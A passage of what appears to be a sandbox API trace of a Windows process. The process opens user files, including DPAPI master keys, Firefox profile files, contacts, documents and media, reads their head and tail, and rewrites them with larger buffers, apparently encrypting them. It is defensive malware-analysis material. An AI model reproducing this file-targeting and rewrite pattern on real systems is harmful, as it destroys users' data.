lpOverlapped=0x0) returned 1 [0177.253] WriteFile (in: hFile=0x1d8, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0177.254] WriteFile (in: hFile=0x1d8, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0177.254] WriteFile (in: hFile=0x1d8, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x359f28c*=0xf000, lpOverlapped=0x0) returned 1 [0177.254] WriteFile (in: hFile=0x1d8, lpBuffer=0x2840938*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x2840938*, lpNumberOfBytesWritten=0x359f28c*=0x8000, lpOverlapped=0x0) returned 1 [0177.254] VirtualFree (lpAddress=0x7eda0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0177.256] CloseHandle (hObject=0x1d8) returned 1 [0177.256] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\Acrobat\\10.0\\Security\\CRLCache\\A9B8213768ADC68AF64FCC6409E8BE414726687F.crl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\a9b8213768adc68af64fcc6409e8be414726687f.crl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0177.258] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.258] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x9347 [0177.258] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.258] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.258] ReleaseMutex (hMutex=0x168) returned 1 [0177.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", cchWideChar=44, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 44 [0177.258] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", cchWideChar=44, lpMultiByteStr=0x1fb3c1c, cbMultiByte=44, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9B8213768ADC68AF64FCC6409E8BE414726687F.crl", lpUsedDefaultChar=0x0) returned 44 [0177.258] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0177.263] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x8347 [0177.263] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.264] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x8347 [0177.264] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a76d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a76d8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.264] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0177.264] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0177.265] CloseHandle (hObject=0x1d8) returned 1 [0177.265] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\gNoysm9.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gnoysm9.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0177.265] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.266] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x17db3 [0177.266] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.266] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.266] ReleaseMutex (hMutex=0x168) returned 1 [0177.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gNoysm9.mp3", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0177.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gNoysm9.mp3", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gNoysm9.mp3", lpUsedDefaultChar=0x0) returned 11 [0177.266] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0177.267] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x16db3 [0177.267] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.267] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0x16db3 [0177.267] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a76d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a76d8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.268] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0177.268] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0177.269] CloseHandle (hObject=0x1d8) returned 1 [0177.269] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0177.270] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.270] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x1d4 [0177.270] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.270] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.270] ReleaseMutex (hMutex=0x168) returned 1 [0177.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0177.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", cchWideChar=36, lpMultiByteStr=0x1fa54dc, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="be5b4fbd-cb99-45f5-9462-5f896dd3a6b9", lpUsedDefaultChar=0x0) returned 36 [0177.270] ReadFile (in: hFile=0x1d8, lpBuffer=0x26dd2c8, nNumberOfBytesToRead=0x1d4, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26dd2c8*, lpNumberOfBytesRead=0x359f2bc*=0x1d4, lpOverlapped=0x0) returned 1 [0177.271] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0177.271] WriteFile (in: hFile=0x1d8, lpBuffer=0x2842988*, nNumberOfBytesToWrite=0x75c, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2842988*, lpNumberOfBytesWritten=0x359f2d0*=0x75c, lpOverlapped=0x0) returned 1 [0177.271] CloseHandle (hObject=0x1d8) returned 1 [0177.272] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\Preferred" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\preferred"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0177.272] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.272] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x18 [0177.272] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.272] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.272] ReleaseMutex (hMutex=0x168) returned 1 [0177.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Preferred", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0177.272] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Preferred", cchWideChar=9, lpMultiByteStr=0x1f7340c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Preferred", lpUsedDefaultChar=0x0) returned 9 [0177.273] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f88d30, nNumberOfBytesToRead=0x18, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88d30*, lpNumberOfBytesRead=0x359f2bc*=0x18, lpOverlapped=0x0) returned 1 [0177.273] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0177.273] WriteFile (in: hFile=0x1d8, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x359f2d0*=0x5a0, lpOverlapped=0x0) returned 1 [0177.274] CloseHandle (hObject=0x1d8) returned 1 [0177.274] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0177.274] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.274] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x8d [0177.274] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.275] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.275] ReleaseMutex (hMutex=0x168) returned 1 [0177.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="extensions.ini", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0177.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="extensions.ini", cchWideChar=14, lpMultiByteStr=0x1f7366c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="extensions.ini", lpUsedDefaultChar=0x0) returned 14 [0177.275] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f6da38, nNumberOfBytesToRead=0x8d, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f6da38*, lpNumberOfBytesRead=0x359f2bc*=0x8d, lpOverlapped=0x0) returned 1 [0177.276] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0177.276] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x359f2d0*=0x615, lpOverlapped=0x0) returned 1 [0177.276] CloseHandle (hObject=0x1d8) returned 1 [0177.277] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0177.277] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.277] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x6f [0177.277] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.277] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.278] ReleaseMutex (hMutex=0x168) returned 1 [0177.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="profiles.ini", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.278] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="profiles.ini", cchWideChar=12, lpMultiByteStr=0x1f7340c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="profiles.ini", lpUsedDefaultChar=0x0) returned 12 [0177.278] ReadFile (in: hFile=0x1d8, lpBuffer=0x26d8db8, nNumberOfBytesToRead=0x6f, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26d8db8*, lpNumberOfBytesRead=0x359f2bc*=0x6f, lpOverlapped=0x0) returned 1 [0177.279] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0177.279] WriteFile (in: hFile=0x1d8, lpBuffer=0x26cf6b8*, nNumberOfBytesToWrite=0x5f7, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesWritten=0x359f2d0*=0x5f7, lpOverlapped=0x0) returned 1 [0177.279] CloseHandle (hObject=0x1d8) returned 1 [0177.279] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\wFv3ceIkcoRO2hm4q1.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\wfv3ceikcoro2hm4q1.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0177.280] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.280] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0xeb1d [0177.280] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.280] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.280] ReleaseMutex (hMutex=0x168) returned 1 [0177.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wFv3ceIkcoRO2hm4q1.wav", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0177.280] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wFv3ceIkcoRO2hm4q1.wav", cchWideChar=22, lpMultiByteStr=0x1f88bcc, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wFv3ceIkcoRO2hm4q1.wav", lpUsedDefaultChar=0x0) returned 22 [0177.280] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x359f278*=0x4000, lpOverlapped=0x0) returned 1 [0177.281] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xdb1d [0177.281] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x359f278*=0x1000, lpOverlapped=0x0) returned 1 [0177.281] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x359f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f2e8*=0) returned 0xdb1d [0177.282] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a76d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a76d8*, lpNumberOfBytesWritten=0x359f28c*=0x1588, lpOverlapped=0x0) returned 1 [0177.282] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f2bc*=0) returned 0x0 [0177.282] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x359f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x359f28c*=0x4000, lpOverlapped=0x0) returned 1 [0177.283] CloseHandle (hObject=0x1d8) returned 1 [0177.283] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0177.283] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.283] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x496 [0177.283] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.283] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.284] ReleaseMutex (hMutex=0x168) returned 1 [0177.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lulcit amkdfe.contact", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0177.284] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lulcit amkdfe.contact", cchWideChar=21, lpMultiByteStr=0x1f88bcc, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lulcit amkdfe.contact", lpUsedDefaultChar=0x0) returned 21 [0177.284] ReadFile (in: hFile=0x1d8, lpBuffer=0x2663858, nNumberOfBytesToRead=0x496, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesRead=0x359f2bc*=0x496, lpOverlapped=0x0) returned 1 [0177.286] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0177.286] WriteFile (in: hFile=0x1d8, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0xa1e, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x359f2d0*=0xa1e, lpOverlapped=0x0) returned 1 [0177.286] CloseHandle (hObject=0x1d8) returned 1 [0177.286] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\JlHpXBn7\\BsKG7.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jlhpxbn7\\bskg7.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0177.287] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.287] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x7ec1 [0177.287] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0177.287] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0177.287] ReleaseMutex (hMutex=0x168) returned 1 [0177.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BsKG7.ppt", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0177.287] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BsKG7.ppt", cchWideChar=9, lpMultiByteStr=0x1f7362c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BsKG7.ppt", lpUsedDefaultChar=0x0) returned 9 [0177.287] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x359f278, 